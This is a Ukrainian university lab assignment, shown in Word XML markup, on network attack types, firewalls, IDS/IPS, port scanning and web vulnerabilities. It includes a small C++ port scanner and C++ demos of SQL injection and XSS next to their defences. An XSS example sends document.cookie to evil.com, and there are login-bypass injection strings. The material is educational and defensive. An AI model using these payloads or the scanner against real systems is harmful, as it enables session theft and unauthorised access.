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№9</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Програмні засоби захисту від атак з мережі Internet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основні типи мережевих атак та програмні засоби захисту від них. Навчитися аналізувати мережевий трафік, налаштовувати брандмауер та виявляти вразливості.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встановленим Wireshark або tcpdump; Доступ до командного рядка з правами адміністратора; Компілятор або інтерпретатор мови програмування за вибором студента; Віртуальна машина (опціонально, для безпечних експериментів).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</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Робота змінює правила брандмауера й сканує порти. Виконуйте її у віртуальній машині або на власному комп’ютері, сканувати дозволено лише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та вузли, на які є письмовий дозвіл власника: несанкціоноване сканування чужих систем порушує закон. Перед зміною правил збережіть поточні (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">iptables-save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netsh advfirewall export</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), а наприкінці роботи видаліть усі створені правила.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="14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типи-мережевих-атак"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1 Типи мережевих атак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КЛАСИФІКАЦІЯ МЕРЕЖЕВИХ АТАК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ЗА МЕТОЮ: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├── Отримання доступу (Access attacks)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├── Підбір паролів (Brute force)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├── Експлуатація вразливостей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└── Man-in-the-Middle (MITM)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├── Відмова в обслуговуванні (DoS/DDoS)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├── SYN Flood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├── UDP Flood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└── Amplification attacks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 Розвідка (Reconnaissance)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├── Сканування портів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├── Сканування вразливостей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└── DNS enumeration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ЗА РІВНЕМ OSI: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├── L2: ARP spoofing, MAC flooding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├── L3: IP spoofing, ICMP attacks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├── L4: TCP/UDP attacks, port scanning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 L7: SQL injection, XSS, CSRF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брандмауер-firewall"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2 Брандмауер (Firewall)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Брандмауер — це програмний або апаратний засіб, який фільтрує мережевий трафік за заданими правилами.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Типи брандмауерів:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TableCaption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Таблиця 1 — Типи брандмауерів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Рівень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Особливості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Пакетний фільтр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L3-L4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Фільтрація за IP, портами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Stateful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L3-L4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Відстеження з’єднань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Аналіз протоколів HTTP, FTP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Next-Gen (NGFW)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L3-L7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DPI, IPS, антивірус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Базові правила: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ЛОГІКА ПРАВИЛ БРАНДМАУЕРА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Правила перевіряються ПОСЛІДОВНО (зверху вниз)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Перше правило, що підходить, визначає долю пакета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Приклад набору правил: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┌─────────────────────────────────────────────────────────────────┐│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1. ALLOW state=ESTABLISHED,RELATED (відповіді на наші запити)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2. ALLOW TCP dst-port=443 (HTTPS)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3. ALLOW TCP dst-port=80  (HTTP)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4. ALLOW ICMP type=8      (ping request)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5. DENY ALL               (все інше заборонено)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└─────────────────────────────────────────────────────────────────┘│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Принцип: "Deny by default" — заборонено все, крім явно дозволеного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Правило 1 робить брандмауер stateful: без нього комп'ютер не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отримав би навіть відповіді DNS-сервера на власний запит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0"/>
    <w:bookmarkStart w:id="11" w:name="ids-та-ips"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3 IDS та IPS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">IDS (Intrusion Detection System)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— система виявлення вторгнень. Аналізує трафік і сповіщає про підозрілу активність.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">IPS (Intrusion Prevention System)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— система запобігання вторгненням. Не тільки виявляє, а й блокує атаки.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TableCaption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Таблиця 2 — Порівняння IDS та IPS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IDS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IPS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Розташування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Поруч з трафіком (span port)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На шляху трафіку (inline)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Сповіщення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Блокування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Затримка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Мінімальна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Додає латентність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Помилкові спрацювання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Менш критичні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Можуть блокувати легітимний трафік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Методи виявлення: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Сигнатурний</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: пошук відомих патернів атак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Аномальний</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: виявлення відхилень від нормальної поведінки</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Евристичний</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: аналіз підозрілої поведінки</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="11"/>
    <w:bookmarkStart w:id="12" w:name="веб-вразливості-owasp-top-10"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4 Веб-вразливості (OWASP Top 10)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SQL-ін’єкція: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-- Вразливий код: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SELECT * FROM users WHERE login='$input' AND pass='$pass'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-- Атака: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login: admin'--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pass: anything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-- Результат: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SELECT * FROM users WHERE login='admin'--' AND pass='anything'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 Коментар '--' ігнорує перевірку пароля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XSS (Cross-Site Scripting):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&lt;!-- Вразливий код: --&gt;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&lt;p&gt;Привіт, &lt;?php echo $_GET['name']; ?&gt;&lt;/p&gt;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&lt;!-- Атака: --&gt;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?name=&lt;script&gt;document.location='http://evil.com/s.php?c='+document.cookie&lt;/script&gt;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&lt;!-- Результат: виконання JavaScript у браузері жертви --&gt;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Захист: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SQL: параметризовані запити (prepared statements)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XSS: екранування виводу, Content Security Policy (CSP)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="12"/>
    <w:bookmarkStart w:id="13" w:name="інструменти"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5 Інструменти</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TableCaption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Таблиця 3 — Інструменти аналізу мережевої безпеки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Інструмент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Wireshark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Аналіз трафіку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GUI-інтерфейс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tcpdump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Захоплення пакетів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tcpdump -i eth0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nmap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Сканування портів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nmap -sV target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netstat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Перегляд з’єднань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netstat -an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iptables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Брандмауер Linux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iptables -L</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="13"/>
    <w:bookmarkEnd w:id="14"/>
    <w:bookmarkStart w:id="28" w:name="приклад-виконання"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Приклад виконання</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="18" w:name="завдання-1-аналіз-мережевого-трафіку"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Завдання 1: Аналіз мережевого трафіку</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="15" w:name="windows-powershell"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Windows (PowerShell)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Перегляд активних TCP-з'єднань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Get-NetTCPConnection | Where-Object State -eq 'Established'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Select-Object LocalPort, RemoteAddress, RemotePort, OwningProcess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Sort-Object RemoteAddress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Перегляд активних UDP-з'єднань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Get-NetUDPEndpoint | Select-Object LocalPort, OwningProcess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Визначення процесу за PID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Get-Process -Id 1234 | Select-Object Name, Path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5"/>
    <w:bookmarkStart w:id="16" w:name="linux-bash"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Linux (bash)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Активні з'єднання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ss -tunapl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Або через netstat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netstat -tunapl | grep ESTABLISHED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Захоплення HTTP-трафіку (any — усі інтерфейси: у сучасних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дистрибутивах мережева карта зветься не eth0, а, наприклад, enp0s3)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tcpdump -i any port 80 -A | head -50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wireshark"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Wireshark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Запустіть Wireshark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Виберіть мережевий інтерфейс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Застосуйте фільтр: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tcp.port == 443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Проаналізуйте захоплені пакети</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Корисні фільтри Wireshark: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5580"/>
        <w:gridCol w:w="4057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Фільтр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Опис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ip.addr == 192.168.1.1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Трафік з/на IP-адресу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tcp.port == 80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HTTP-трафік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http.request.method == "POST"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POST-запити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dns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DNS-запити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tcp.flags.syn == 1 &amp;&amp; tcp.flags.ack == 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SYN-пакети (початок з’єднання)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="17"/>
    <w:bookmarkEnd w:id="18"/>
    <w:bookmarkStart w:id="21" w:name="завдання-2-налаштування-брандмауера"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Завдання 2: Налаштування брандмауера</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="19" w:name="X0662c116dd2737dcfed58aa4a6d4125c8494f4f"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Windows Firewall (PowerShell з правами адміністратора)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Перегляд поточних правил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Get-NetFirewallRule | Where-Object Enabled -eq True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Select-Object DisplayName, Direction, Action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Створення правила: блокувати вхідні на порт 23 (Telnet)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New-NetFirewallRule -DisplayName "Block Telnet"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-Direction Inbound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-LocalPort 23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-Protocol TCP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-Action Block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Створення правила: дозволити вхідні на порт 443 (HTTPS)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New-NetFirewallRule -DisplayName "Allow HTTPS"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-Direction Inbound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-LocalPort 443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-Protocol TCP `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-Action Allow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Видалення правила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Remove-NetFirewallRule -DisplayName "Block Telnet"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Перевірка статусу брандмауера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Get-NetFirewallProfile | Select-Object Name, Enabled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9"/>
    <w:bookmarkStart w:id="20" w:name="linux-iptables"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Linux iptables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Перегляд поточних правил і резервна копія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-L -n -v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iptables-save | sudo tee /root/iptables.backup &gt; /dev/null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Спершу — те, без чого машина втратить мережу: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локальний інтерфейс і відповіді на з'єднання, які ми відкрили самі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-A INPUT -i lo -j ACCEPT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-A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT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Якщо працюєте у ВМ через SSH — дозволити його ДО заборони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-A INPUT -p tcp --dport 22 -j ACCEPT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Дозволити вхідні на порти 80 і 443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-A INPUT -p tcp --dport 80 -j ACCEPT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-A INPUT -p tcp --dport 443 -j ACCEPT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Заблокувати вхідні з конкретної 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-A INPUT -s 10.0.0.100 -j DROP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Заборонити все інше (в кінці)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 -A INPUT -j DROP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Відновити початковий стан після роботи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iptables-restore &lt; /root/iptables.backup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Два підводні камені. Перенаправлення</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo iptables-save &gt; /etc/файл</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">не спрацює: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виконує ваша оболонка без прав root, тому тут використано</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">tee</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. І в Ubuntu, Debian та Fedora команда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 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">насправді працює поверх nftables, а для простих правил зручніша обгортка</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ufw</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo ufw deny 23/tcp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="20"/>
    <w:bookmarkEnd w:id="21"/>
    <w:bookmarkStart w:id="24" w:name="завдання-3-сканування-портів"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Завдання 3: Сканування портів</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Увага</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: сканування портів без дозволу власника системи є незаконним. Використовуйте тільки на власних системах або з явного дозволу.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="22" w:name="перевірка-відкритих-портів-локально"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Перевірка відкритих портів локально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Windows: перевірка прослуховуваних портів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Get-NetTCPConnection -State Listen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Select-Object LocalPort, OwningProcess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Sort-Object LocalPort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Визначення процесів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Get-NetTCPConnection -State Listen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ForEach-Object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$proc = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue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[PSCustomObject]@{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Port = $_.LocalPort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Process = $proc.Name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Path = $proc.Path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 | Sort-Object Port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Linux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ss -tuln | grep LISTEN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2"/>
    <w:bookmarkStart w:id="23" w:name="базове-сканування-портів"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Базове сканування портів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Сканер портів. Збірка у Visual Studio: проєкт консольного застосунку,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у властивостях додати бібліотеку ws2_32.lib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(Linker → Input → Additional Dependencies).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#ifdef _WIN32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#include &lt;winsock2.h&gt;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#include &lt;ws2tcpip.h&gt;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#pragma comment(lib, "ws2_32.lib")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using socket_t = SOCKET;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const socket_t INVALID_SOCK = INVALID_SOCKET;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#include &lt;sys/socket.h&gt;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#include &lt;arpa/inet.h&gt;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#include &lt;unistd.h&gt;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using socket_t = int;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const socket_t INVALID_SOCK = -1;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#define closesocket close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#endif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struct ServiceName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port;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char* name;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const ServiceName KNOWN_SERVICES[]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{21, "FTP"},   {22, "SSH"},   {23, "Telnet"}, {25, "SMTP"},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{53, "DNS"},   {80, "HTTP"},  {110, "POP3"},  {143, "IMAP"},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{443, "HTTPS"},{445, "SMB"},  {3306, "MySQL"},{3389, "RDP"},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{5432, "PostgreSQL"}, {8080, "HTTP-alt"}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const char* serviceName(int port)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(const ServiceName&amp; service : KNOWN_SERVICES)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(service.port == port) return service.name;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"Unknown";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Спроба встановити з'єднання: успіх означає, що порт відкритий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isPortOpen(const std::string&amp; host, int port, int timeoutMs = 500)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socket_t sock = socket(AF_INET, SOCK_STREAM, 0);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(sock == INVALID_SOCK) return false;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Обмежуємо час очікування. На Linux connect() зважає на SO_SNDTIMEO;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Windows цей параметр для connect() ігнорує, і там надійний тайм-аут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потребує неблокувального сокета й select(). Для 127.0.0.1 це не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важливо: закритий порт відповідає відмовою (RST) миттєво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#ifdef _WIN32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DWORD timeout = static_cast&lt;DWORD&gt;(timeoutMs);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setsockopt(sock, SOL_SOCKET, SO_SNDTIMEO,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reinterpret_cast&lt;const char*&gt;(&amp;timeout), sizeof(timeout));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timeval timeout{ timeoutMs / 1000, (timeoutMs % 1000) * 1000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setsockopt(sock, SOL_SOCKET, SO_SNDTIMEO, &amp;timeout, sizeof(timeout));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#endif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sockaddr_in address{};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address.sin_family = AF_INET;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address.sin_port = htons(static_cast&lt;unsigned short&gt;(port));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inet_pton(AF_INET, host.c_str(), &amp;address.sin_addr);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bool opened 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connect(sock, reinterpret_cast&lt;sockaddr*&gt;(&amp;address), sizeof(address)) ==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closesocket(sock);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opened;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УВАГА: сканувати дозволено лише власний комп'ютер або вузол,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на який є письмовий дозвіл власника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std::string target = "127.0.0.1";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std::vector&lt;int&gt; ports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21, 22, 23, 25, 53, 80, 110, 135, 139, 143,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443, 445, 993, 995, 1433, 3306, 3389, 5432, 8080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#ifdef _WIN32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WSADATA wsa;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(WSAStartup(MAKEWORD(2, 2), &amp;wsa)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std::cerr &lt;&lt; "Не вдалося ініціалізувати Winsock\n";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#endif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"Сканування " &lt;&lt; target &lt;&lt; "...\n\n";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"Відкриті порти:\n";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int found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port : ports)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(isPortOpen(target, port))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std::cout &lt;&lt; "  " &lt;&lt; port &lt;&lt; "/tcp - " &lt;&lt; serviceName(port)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++found;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if (found ==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 (жодного з перевірених портів не відкрито)\n";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#ifdef _WIN32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WSACleanup();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#endif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3"/>
    <w:bookmarkEnd w:id="24"/>
    <w:bookmarkStart w:id="27" w:name="завдання-4-захист-веб-застосунку"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Завдання 4: Захист веб-застосунку</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="25" w:name="демонстрація-sql-інєкції-та-захисту"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Демонстрація SQL-ін’єкції та захисту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Демонстрація SQL-ін'єкції та захисту від неї.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Потрібна бібліотека SQLite: у Visual Studio додайте sqlite3.c і sqlite3.h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до проєкту (амальгама з sqlite.org) або підключіть пакет через NuGet.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"sqlite3.h"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Створює навчальну базу в пам'яті з двома обліковими записами.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Паролі лежать відкрито лише для наочності атаки; у справжній системі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зберігають хеш Argon2id (лекція «Ідентифікація та аутентифікація»)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sqlite3* setupDatabase()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sqlite3* db = nullptr;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sqlite3_open(":memory:", &amp;db);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char* schema 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"CREATE TABLE users ("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  id INTEGER PRIMARY KEY,"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  login TEXT NOT NULL,"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  password TEXT NOT NULL,"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  role TEXT DEFAULT 'user');"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"INSERT INTO users (login, password, role)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"VALUES ('admin', 'secret123', 'admin');"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"INSERT INTO users (login, password, role)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"VALUES ('user1', 'pass1', 'user');";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sqlite3_exec(db, schema, nullptr, nullptr, nullptr);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db;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ВРАЗЛИВИЙ варіант: запит склеюється з рядків, дані користувача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потрапляють у текст запиту й змінюють його структуру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vulnerableLogin(sqlite3* db, const std::string&amp; login,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const std::string&amp; password)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query = "SELECT login, role FROM users WHERE login='" + login +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"' AND password='" + password + "'";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"[ВРАЗЛИВИЙ] Запит:\n  " &lt;&lt; query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sqlite3_stmt* stmt = nullptr;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(sqlite3_prepare_v2(db, query.c_str(), -1, &amp;stmt, nullptr) != SQLITE_OK)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"[ВРАЗЛИВИЙ] Помилка SQL: " &lt;&lt; sqlite3_errmsg(db)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bool found = (sqlite3_step(stmt) == SQLITE_ROW);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(found)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"[ВРАЗЛИВИЙ] Вхід виконано як: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&lt;&lt; sqlite3_column_text(stmt, 0) &lt;&lt; " (роль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&lt;&lt; sqlite3_column_text(stmt, 1) &lt;&lt; ")\n";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sqlite3_finalize(stmt);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found;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БЕЗПЕЧНИЙ варіант: структура запиту фіксована, дані передаються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окремо через параметри й ніколи не тлумачаться як код SQL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safeLogin(sqlite3* db, const std::string&amp; login, const std::string&amp; password)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char* query = "SELECT login, role FROM users WHERE login=? AND password=?";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"[БЕЗПЕЧНИЙ] Запит:\n  " &lt;&lt; query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"[БЕЗПЕЧНИЙ] Параметри: ('" &lt;&lt; login &lt;&lt; "', '" &lt;&lt; password &lt;&lt; "')\n";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sqlite3_stmt* stmt = nullptr;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sqlite3_prepare_v2(db, query, -1, &amp;stmt, nullptr);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sqlite3_bind_text(stmt, 1, login.c_str(), -1, SQLITE_TRANSIENT);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sqlite3_bind_text(stmt, 2, password.c_str(), -1, SQLITE_TRANSIENT);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bool found = (sqlite3_step(stmt) == SQLITE_ROW);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(found)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"[БЕЗПЕЧНИЙ] Вхід виконано як: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&lt;&lt; sqlite3_column_text(stmt, 0)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sqlite3_finalize(stmt);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found;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sqlite3* db = setupDatabase();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Коректний вхід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vulnerableLogin(db, "admin", "secret123");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"\n=== Атака SQL-ін'єкцією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Введене значення закриває лапку й додає умову, істинну завжди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injection = "' OR '1'='1";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bool bypassed = vulnerableLogin(db, "admin", injection);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"Результат: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(bypassed ? "ЗАХИСТ ОБІЙДЕНО" : "доступ відхилено")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"\n=== Та сама атака на параметризованому запиті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bool blocked = safeLogin(db, "admin", injection);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"Результат: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(blocked ? "ЗАХИСТ ОБІЙДЕНО" : "доступ відхилено")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sqlite3_close(db);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Коректний вхід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[ВРАЗЛИВИЙ] Запит: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SELECT login, role FROM users WHERE login='admin' AND password='secret123'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[ВРАЗЛИВИЙ] Вхід виконано як: admin (роль admin)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=== Атака SQL-ін'єкцією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[ВРАЗЛИВИЙ] Запит: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SELECT login, role FROM users WHERE login='admin' AND password='' OR '1'='1'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[ВРАЗЛИВИЙ] Вхід виконано як: admin (роль admin)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Результат: ЗАХИСТ ОБІЙДЕНО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=== Та сама атака на параметризованому запиті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[БЕЗПЕЧНИЙ] Запит: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SELECT login, role FROM users WHERE login=? AND password=?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[БЕЗПЕЧНИЙ] Параметри: ('admin', '' OR '1'='1')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Результат: доступ відхилено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Подивіться на другий запит: введений «пароль» закрив лапку й дописав умову</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">OR '1'='1'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, яка істинна для кожного рядка таблиці. Оскільки AND виконується раніше за OR, запит повертає всі записи, і перший з них — адміністратор. У параметризованому запиті те саме значення лишилося просто рядком символів, який не збігся з жодним паролем.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="25"/>
    <w:bookmarkStart w:id="26" w:name="демонстрація-xss-та-захисту"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Демонстрація XSS та захисту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Екранування для HTML: символи, що мають у розмітці особливе значення,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замінюються сутностями, і браузер показує їх як текст, а не виконує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htmlEscape(const std::string&amp; input)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out;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input)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switch (c)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'&amp;':  out += "&amp;amp;";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'&lt;':  out += "&amp;lt;";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'&gt;':  out += "&amp;gt;";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'"':  out += "&amp;quot;";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'\'': out += "&amp;#39;";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default:   out += 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out;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std::string name = "&lt;script&gt;alert(\"XSS\")&lt;/script&gt;";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"Введено: " &lt;&lt; name &lt;&lt; "\n\n";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"Без захисту:\n  &lt;p&gt;Привіт, " &lt;&lt; name &lt;&lt; "&lt;/p&gt;\n";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-&gt; браузер виконає скрипт\n\n";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"З екрануванням:\n  &lt;p&gt;Привіт, " &lt;&lt; htmlEscape(name) &lt;&lt; "&lt;/p&gt;\n";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  -&gt; браузер покаже скрипт як звичайний текст\n";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Введено: &lt;script&gt;alert("XSS")&lt;/script&gt;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Без захисту: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&lt;p&gt;Привіт, &lt;script&gt;alert("XSS")&lt;/script&gt;&lt;/p&gt;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-&gt; браузер виконає скрипт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З екрануванням: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&lt;p&gt;Привіт, &amp;lt;script&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/script&amp;gt;&lt;/p&gt;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-&gt; браузер покаже скрипт як звичайний текст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6"/>
    <w:bookmarkEnd w:id="27"/>
    <w:bookmarkEnd w:id="28"/>
    <w:bookmarkStart w:id="29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4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4"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Аналіз мережевого трафіку: запустити Wireshark на основному інтерфейсі, відвідати кілька сайтів через HTTP і HTTPS, знайти HTTP-запити й порівняти, що видно у відкритому та зашифрованому трафіку; застосувати фільтри з таблиці.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Налаштування брандмауера: зберегти поточні правила, створити правило блокування й правило дозволу для портів свого варіанта, перевірити їхню дію, після чого видалити тестові правила й відновити початковий стан.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Сканування портів: визначити відкриті порти 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командами ОС і власним сканером, зіставити їх із процесами, що їх прослуховують.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Захист веб-застосунку: запустити демонстрацію SQL-ін’єкції та XSS, показати успішну атаку на вразливий варіант і її блокування безпечним.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1004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4"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Оформити звіт та зробити висновок.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="29"/>
    <w:bookmarkStart w:id="30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знімки екрана Wireshark з фільтрами;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команди та результати налаштування брандмауера;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результати сканування портів з ідентифікацією сервісів;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код та результати демонстрації SQL-ін’єкції та XSS;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висновок про методи захисту від мережевих атак.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="30"/>
    <w:bookmarkStart w:id="31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409"/>
        <w:gridCol w:w="2409"/>
        <w:gridCol w:w="2409"/>
        <w:gridCol w:w="241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Порт для блокування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Порт для дозволу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21 (FTP)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 Wireshark DNS-запити. Які домени запитувалися?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23 (Telnet)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80 (HTTP)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детектор SYN-сканування (багато SYN без ACK).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25 (SMTP)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993 (IMAPS)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 трафіку User-Agent браузера. Яку інформацію він розкриває?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110 (POP3)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995 (POP3S)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фільтр для виявлення підозрілих POST-запитів.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135 (RPC)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3389 (RDP)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HTTP та HTTPS трафік. Що видно в кожному?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139 (NetBIOS)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445 (SMB)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ARP-запити в трафіку. Для чого вони використовуються?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143 (IMAP)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587 (SMTP)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простий rate limiter для захисту від brute force.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445 (SMB)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22 (SSH)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Проаналізувати TLS handshake. Які версії протоколу використовуються?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1433 (MSSQL)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5432 (PostgreSQL)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ICMP-пакети. Що показує ping?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3306 (MySQL)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8080 (HTTP-alt)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перевірку на CSRF-токени.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5900 (VNC)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 трафіку cookies. Які дані вони містять?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8080 (HTTP-alt)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80 (HTTP)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whitelist IP-адрес у брандмауері.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1521 (Oracle)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Визначити операційну систему за TTL пакетів.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27017 (MongoDB)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логування всіх заблокованих з’єднань.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6379 (Redis)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 трафіку Referer заголовки. Яку інформацію вони розкривають?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11211 (Memcached)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детектор port knocking.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5432 (PostgreSQL)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3306 (MySQL)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 відповіді різних сервісів. Що це показує?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9200 (Elasticsearch)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перевірку 